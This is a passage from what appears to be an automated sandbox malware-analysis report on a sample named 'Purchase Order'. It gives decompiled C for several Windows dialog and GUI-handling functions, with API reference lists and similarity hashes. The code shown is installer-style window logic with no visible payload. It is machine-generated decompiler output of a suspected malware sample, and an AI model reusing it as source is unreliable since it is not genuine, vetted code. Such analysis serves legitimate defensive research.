											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x434f2c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x42d260);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x434f60 = _t291;
					 *0x42d260 = GlobalAlloc(0x40,  *0x434f2c << 2);
					_t258 = LoadImageW( *0x434f00, 0x6e, 0, 0, 0, 0);
					 *0x42d254 =  *0x42d254 | 0xffffffff;
					_t297 = _t258;
					 *0x42d25c = SetWindowLongW(_v8, 0xfffffffc, E00405513);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42d24c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42d24c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E0040657A(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E00404499(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E00404499(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x434f2c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x42d260 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x42d260 + _t300 * 4) = _t284;
									_v16 =  *( *0x42d260 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x434f2c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004044CE(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004044CE(_v12);
								L93:
								return E00404500(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404f0d
0x00404f26
0x00404f2b
0x00404f33
0x00404f39
0x00404f4f
0x00404f52
0x0040517d
0x00405184
0x00405198
0x00405186
0x00405188
0x0040518b
0x0040518c
0x00405193
0x00405193
0x004051a4
0x004051b2
0x004051b5
0x004051cb
0x00405240
0x00405243
0x00405245
0x0040524f
0x0040525d
0x0040525d
0x0040525f
0x00405269
0x0040526f
0x00405272
0x00405275
0x00405290
0x00405277
0x00405281
0x00405281
0x00405275
0x00405269
0x00000000
0x00405243
0x004051d0
0x004051db
0x004051e0
0x004051e7
0x004051ec
0x004051f0
0x004051fb
0x004051fb
0x004051ff
0x00405203
0x00405207
0x0040521a
0x00405209
0x00405209
0x00405210
0x00405216
0x00405212
0x00405212
0x00405212
0x00405210
0x0040521e
0x00405220
0x00405233
0x00405236
0x00405239
0x00405239
0x00405203
0x00000000
0x004051f0
0x004051d2
0x004051d9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405293
0x00405293
0x0040529a
0x0040530b
0x00405313
0x0040531b
0x0040531b
0x00405324
0x00405326
0x0040532d
0x00405330
0x00405330
0x00405336
0x0040533d
0x00405340
0x00405340
0x00405346
0x0040534c
0x00405352
0x00405352
0x0040535f
0x004054c0
0x004054c7
0x004054e4
0x004054ea
0x004054fc
0x004054fc
0x00000000
0x00405365
0x00405367
0x0040536c
0x00405371
0x00405376
0x00405378
0x00405378
0x00405379
0x0040537a
0x0040537c
0x0040537c
0x00405384
0x004053c5
0x004053c7
0x004053d7
0x004053da
0x004053df
0x004053e6
0x004053e9
0x0040548b
0x00405494
0x0040549c
0x0040549c
0x004054aa
0x004054bb
0x004054bb
0x00000000
0x004054aa
0x004053ef
0x004053f2
0x004053f8
0x004053fd
0x004053ff
0x00405401
0x00405407
0x0040540e
0x00405413
0x0040541a
0x0040541d
0x0040541d
0x00405424
0x00405430
0x00405434
0x00405436
0x00405436
0x00405426
0x00405428
0x00405428
0x00405456
0x00405462
0x00405471
0x00405471
0x00405473
0x00405476
0x0040547f
0x00000000
0x00405386
0x00405391
0x00405394
0x00405399
0x0040539b
0x0040539f
0x004053af
0x004053b9
0x004053bb
0x004053be
0x00000000
0x00000000
0x00000000
0x00000000
0x004053a1
0x004053a1
0x004053a7
0x004053a9
0x004053a9
0x004053aa
0x004053ab
0x00000000
0x004053a1
0x00405384
0x0040535f
0x004052a2
0x00000000
0x004052b8
0x004052c2
0x004052c7
0x00000000
0x00000000
0x004052d9
0x004052de
0x004052ea
0x004052ea
0x004052ec
0x004052fb
0x004052fd
0x00405301
0x00405304
0x00000000
0x00405304
0x004052a2
0x00404f58
0x00404f5d
0x00404f66
0x00404f6d
0x00404f7f
0x00404f8a
0x00404f90
0x00404f9e
0x00404fb2
0x00404fb7
0x00404fc4
0x00404fc9
0x00404fdf
0x00404ff0
0x00404ffd
0x00404ffd
0x00405000
0x00405006
0x00405008
0x0040500b
0x00405010
0x00405015
0x00405017
0x00405017
0x00405037
0x00405037
0x00405039
0x0040503a
0x0040503f
0x00405045
0x00405049
0x0040504e
0x00405056
0x0040505a
0x0040505f
0x00405064
0x0040506c
0x0040506f
0x0040513f
0x00405152
0x00000000
0x00405075
0x00405078
0x0040507b
0x0040507e
0x0040507e
0x00405084
0x0040508d
0x00405090
0x00405094
0x00405097
0x0040509a
0x004050a3
0x004050ac
0x004050af
0x004050b2
0x004050b5
0x004050f3
0x0040511e
0x004050f5
0x00405104
0x00405104
0x004050b7
0x004050ba
0x004050c8
0x004050d2
0x004050da
0x004050e1
0x004050ec
0x004050ec
0x004050b5
0x00405124
0x00405125
0x00405131
0x00405131
0x0040513d
0x00405158
0x0040515b
0x00405178
0x00000000
0x0040515d
0x00405162
0x0040516b
0x004054fe
0x00405510
0x00405510
0x0040515b
0x00000000
0x0040513d
0x0040506f

APIs

GetDlgItem.USER32 ref: 00404F1E
GetDlgItem.USER32 ref: 00404F29
GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
LoadImageW.USER32 ref: 00404F8A
SetWindowLongW.USER32 ref: 00404FA3
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
DeleteObject.GDI32(00000000), ref: 00405000
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102

Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC

SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
GetWindowLongW.USER32(?,000000F0), ref: 00405144
SetWindowLongW.USER32 ref: 00405152
ShowWindow.USER32(?,00000005), ref: 00405162
SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
ImageList_Destroy.COMCTL32(?), ref: 00405330
GlobalFree.KERNEL32 ref: 00405340
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
SendMessageW.USER32(?,00001102,?,?), ref: 00405462
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
ShowWindow.USER32(?,00000000), ref: 004054EA
GetDlgItem.USER32 ref: 004054F5
ShowWindow.USER32(00000000), ref: 004054FC

Strings

, xrefs: 004054D4
N, xrefs: 0040519B
M, xrefs: 004050BA

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
Opcode Fuzzy Hash: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00403F9A Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00403F9A(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;
				void* _t145;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x42d250 = _t34;
					if(_t130 == 0x110) {
						 *0x434f08 = _t127;
						 *0x42d264 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x42b230 = _t91;
						E00404499(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x433ee8);
						 *0x433ecc = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x42d250 = 1;
					}
					_t124 =  *0x40a368; // 0xffffffff
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x434f20;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E004044E5(0x40b);
						while(1) {
							_t36 =  *0x42d250;
							 *0x40a368 =  *0x40a368 + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a368; // 0xffffffff
							__eflags = _t38 -  *0x434f24;
							if(_t38 ==  *0x434f24) {
								E0040140B(1);
							}
							__eflags =  *0x433ecc - _t136;
							if( *0x433ecc != _t136) {
								break;
							}
							__eflags =  *0x40a368 -  *0x434f24; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E0040657A(_t117, _t127, _t133, 0x445000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E00404499(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E00404499(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E00404499(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x434f8c - _t136;
							_v28 = _t48;
							if( *0x434f8c != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008);
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
							E004044BB(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x42b230, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x434f8c - _t136;
							if( *0x434f8c == _t136) {
								_push( *0x42d264);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x42b230);
							}
							E004044CE();
							E0040653D(0x42d268, E00403F7B());
							E0040657A(0x42d268, _t127, _t133,  &(0x42d268[lstrlenW(0x42d268)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x42d268);
							_push(_t136);
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x433ed8);
									 *0x42c240 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x434f00,  *_t133 +  *0x433ee0 & 0x0000ffff, _t127,  *(0x40a36c +  *(_t133 + 4) * 4), _t133);
									__eflags = _t73 - _t136;
									 *0x433ed8 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E00404499(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x433ed8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x433ecc - _t136;
									if( *0x433ecc != _t136) {
										goto L63;
									}
									ShowWindow( *0x433ed8, 8);
									E004044E5(0x405);
									goto L60;
								}
								__eflags =  *0x434f8c - _t136;
								if( *0x434f8c != _t136) {
									goto L63;
								}
								__eflags =  *0x434f80 - _t136;
								if( *0x434f80 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x433ed8);
						 *0x434f08 = _t136;
						EndDialog(_t127,  *0x42ba38);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x433ed8, 0x40f, 0, 1);
						__eflags =  *0x433ecc;
						return 0 |  *0x433ecc == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x42d248, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x433ed8, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x434f8c - _t136;
											if( *0x434f8c == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x42ba38 = 1;
												L23:
												_push(0x78);
												L24:
												E00404472();
												goto L28;
											}
											E0040140B(_t129);
											 *0x42ba38 = _t129;
											goto L23;
										}
										__eflags =  *0x40a368 - _t136; // 0xffffffff
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x433ed8);
						 *0x433ed8 = _t122;
						L60:
						_t145 =  *0x42f268 - _t136; // 0x0
						if(_t145 == 0 &&  *0x433ed8 != _t136) {
							ShowWindow(_t127, 0xa);
							 *0x42f268 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x42d248,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E00404500(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}

0x00403fa5
0x00403fac
0x00404113
0x00404117
0x0040411b
0x0040411d
0x00404122
0x0040412d
0x00404138
0x0040413d
0x0040413f
0x00404141
0x00404144
0x00404149
0x00404157
0x00404164
0x0040416b
0x0040416b
0x0040416c
0x0040416c
0x00404171
0x00404177
0x0040417e
0x00404184
0x00404186
0x004041c6
0x004041cb
0x004041d0
0x004041d0
0x004041d5
0x004041de
0x004041e0
0x004041e5
0x004041eb
0x004041ef
0x004041ef
0x004041f4
0x004041fa
0x00000000
0x00000000
0x00404205
0x0040420b
0x00000000
0x00000000
0x00404214
0x0040421c
0x00404221
0x00404224
0x0040422a
0x0040422f
0x00404232
0x00404238
0x0040423d
0x00404240
0x00404246
0x0040424e
0x00404254
0x0040425a
0x0040425e
0x00404265
0x00404265
0x00404265
0x0040426f
0x00404281
0x0040428d
0x00404292
0x0040429c
0x004042a2
0x004042a4
0x004042a9
0x004042a6
0x004042a6
0x004042a6
0x004042b9
0x004042d1
0x004042d3
0x004042d9
0x004042ee
0x004042db
0x004042e4
0x004042e6
0x004042e6
0x004042f4
0x00404305
0x0040431b
0x00404322
0x00404328
0x0040432c
0x00404331
0x00404333
0x00000000
0x00404339
0x00404339
0x0040433b
0x00000000
0x00000000
0x00404341
0x00404345
0x0040436a
0x00404370
0x00404376
0x00404378
0x00000000
0x00000000
0x0040439e
0x004043a4
0x004043a6
0x004043ab
0x00000000
0x00000000
0x004043b1
0x004043b4
0x004043b7
0x004043ce
0x004043da
0x004043f3
0x004043f9
0x004043fd
0x00404402
0x00404408
0x00000000
0x00000000
0x00404412
0x0040441d
0x00000000
0x0040441d
0x00404347
0x0040434d
0x00000000
0x00000000
0x00404353
0x00404359
0x00000000
0x00000000
0x00000000
0x0040435f
0x00404333
0x0040442a
0x00404436
0x0040443d
0x00000000
0x00404188
0x00404188
0x0040418b
0x004041be
0x004041be
0x004041c0
0x00000000
0x00000000
0x00000000
0x004041c0
0x0040418d
0x00404191
0x00404196
0x00404198
0x00000000
0x00000000
0x004041a8
0x004041b0
0x00000000
0x004041b6
0x00403fbe
0x00403fbe
0x00403fc2
0x00403fc7
0x00403fd6
0x00403fd6
0x00403fdc
0x00403fe3
0x00404027
0x0040402d
0x00404046
0x00404049
0x0040405c
0x00404062
0x00000000
0x00000000
0x00404068
0x00404073
0x00404075
0x00404077
0x00404096
0x00404096
0x00404099
0x0040409e
0x004040a1
0x004040b1
0x004040b2
0x004040b4
0x004040ea
0x004040fa
0x00000000
0x004040fa
0x004040b6
0x004040bc
0x004040d5
0x004040da
0x004040dc
0x00000000
0x00000000
0x004040de
0x004040ca
0x004040ca
0x004040cc
0x004040cc
0x00000000
0x004040cc
0x004040bf
0x004040c4
0x00000000
0x004040c4
0x004040a3
0x004040a9
0x00000000
0x00000000
0x004040ab
0x00000000
0x004040ab
0x0040409b
0x00000000
0x0040409b
0x00404081
0x00404088
0x0040408e
0x00404090
0x00404466
0x00000000
0x00404466
0x00000000
0x00404090
0x0040404e
0x00000000
0x00404056
0x00404035
0x0040403b
0x00404443
0x00404443
0x00404449
0x00404456
0x0040445c
0x0040445c
0x00000000
0x00403fe5
0x00403fea
0x00403ff6
0x00403fff
0x00404100
0x00000000
0x0040401e
0x00404021
0x00000000
0x00404021
0x00403fff
0x00403fe3

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
ShowWindow.USER32(?), ref: 00403FF6
GetWindowLongW.USER32(?,000000F0), ref: 00404008
ShowWindow.USER32(?,00000004), ref: 00404021
DestroyWindow.USER32 ref: 00404035
SetWindowLongW.USER32 ref: 0040404E
GetDlgItem.USER32 ref: 0040406D
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
IsWindowEnabled.USER32(00000000), ref: 00404088
GetDlgItem.USER32 ref: 00404133
GetDlgItem.USER32 ref: 0040413D
SetClassLongW.USER32(?,000000F2,?), ref: 00404157
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
GetDlgItem.USER32 ref: 0040424E
ShowWindow.USER32(00000000,?), ref: 0040426F
EnableWindow.USER32(?,?), ref: 00404281
EnableWindow.USER32(?,?), ref: 0040429C
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B2
EnableMenuItem.USER32 ref: 004042B9
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D1
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
SetWindowTextW.USER32(?,0042D268), ref: 00404322
ShowWindow.USER32(?,0000000A), ref: 00404456

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 1860320154-0
Opcode ID: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
Opcode Fuzzy Hash: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D

Uniqueness

Uniqueness Score: -1.00%

Function 00404658 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00404658(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x42b234 =  *0x42b234 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E00404500(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x432ea0;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404907(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x434f08, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x434f08, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x42b234 != 0) {
						goto L27;
					} else {
						_t116 =  *0x42c240 + 0x14;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004044BB(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004048E3();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x433edc - 4 + _t75 * 4);
				}
				_t76 =  *0x434f38 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404609;
				if(_t110 != 2) {
					_v8 = E004045CF;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E00404499(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E00404499(_a4);
